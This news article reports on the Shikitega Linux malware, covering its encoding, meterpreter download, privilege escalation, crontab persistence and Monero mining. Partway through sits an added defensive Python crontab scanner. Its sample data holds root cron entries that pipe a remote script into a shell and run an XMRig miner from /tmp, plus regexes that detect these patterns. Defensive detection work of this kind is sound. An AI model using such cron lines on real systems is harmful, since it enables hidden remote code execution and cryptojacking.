AT&T outs new 'Shikitega' Linux malware


Drops Monero crypto miner.

Researchers at AT&T Cybersecurity say they have found new malware that attacks networked hosts and IoT devices that run Linux-based operating systems.


AT&T has named the malware "Shikitega" after finding that it uses the Shikata Ga Nai polymorphic XOR additive feedback encoder from the penetration testing framework Metasploit to hide its malicious functionality from anti-virus scans.

After performing multiple decoding loops on a very small Executable and Linkable Format (ELF) program, just 300 bytes in size, Shikitega fetches the Mettle Metasploit meterpreter, developed by security vendor Rapid7.

Meterpreters are attack payloads that provide interactive command shells to explore and fully exploit and control target systems.

Another ELF binary executes shell commands and additional files, the researchers said.

Files downloaded by this last-stage dropper exploit two Linux privilege escalation bugs to obtain root superuser privileges.

One of the vulnerabilities, named PwnKit by Qualys, lay undetected in Linux for 12 years.

Shikitega adds itself to the system crontab task scheduler, with root privileges, for persistence, and proceeds to download and run the XMRig Monero pseudonymous cryptocurrency miner.
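As an added defensive example (not code from the AT&T write-up or this article), the check below parses system-crontab entries (the `/etc/crontab` and `/etc/cron.d` format with a user field) and flags the persistence pattern described above: a root-owned job that pulls a script from the network, runs a binary from a scratch directory, or carries miner-style arguments. The sample entries, host address and pool name are constructed for illustration.

```python
import glob
import os
import re

# Constructed sample in /etc/crontab format: schedule, user, command.
# The address is a documentation (TEST-NET) range, not a real indicator.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    curl -s http://203.0.113.10/x.sh | sh
@reboot         root    /tmp/.xmrig -o pool.example:3333 --donate-level 0
0 2     * * *   backup  /usr/local/bin/nightly-backup.sh
"""

DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
MINER_HINTS = re.compile(r"xmrig|stratum\+tcp|--donate-level", re.I)
SCRATCH_EXEC = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")

def parse_system_crontab(text):
    """Yield (schedule, user, command) for each active entry; comments and
    blank lines are skipped, @reboot-style schedules are handled."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            yield parts[0], parts[1], parts[2]
        else:
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            yield " ".join(parts[:5]), parts[5], parts[6]

def suspicious_entries(text):
    """Return [(reasons, user, schedule, command)] for entries matching the
    download-and-run, scratch-directory or miner-argument patterns."""
    findings = []
    for sched, user, cmd in parse_system_crontab(text):
        reasons = []
        if DOWNLOAD_TO_SHELL.search(cmd):
            reasons.append("downloads and pipes to shell")
        if SCRATCH_EXEC.search(cmd):
            reasons.append("executes from scratch directory")
        if MINER_HINTS.search(cmd):
            reasons.append("miner-style arguments")
        if reasons:
            reasons.append("runs as root" if user == "root" else "runs as " + user)
            findings.append(("; ".join(reasons), user, sched, cmd))
    return findings

if __name__ == "__main__":
    # Scan the live system crontabs if present, otherwise the constructed sample.
    files = [p for p in ["/etc/crontab"] + glob.glob("/etc/cron.d/*") if os.path.isfile(p)]
    texts = [open(p).read() for p in files] or [SAMPLE_CRONTAB]
    for text in texts:
        for reasons, user, sched, cmd in suspicious_entries(text):
            print(f"[{reasons}] {sched} {user} {cmd}")
```

Running it as root on a live host prints any flagged entries; user crontabs under the spool directory use a schedule-plus-command format without a user field and would need the user taken from the file name instead.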

The malware also uses cloud systems to host command and control servers, AT&T said.

AT&T did not specify which endpoint hosts and IoT systems the malware specifically targets, but advised users to update their software, run an anti-virus, and back up system and server files.

Copyright © iTnews.com.au . All rights reserved.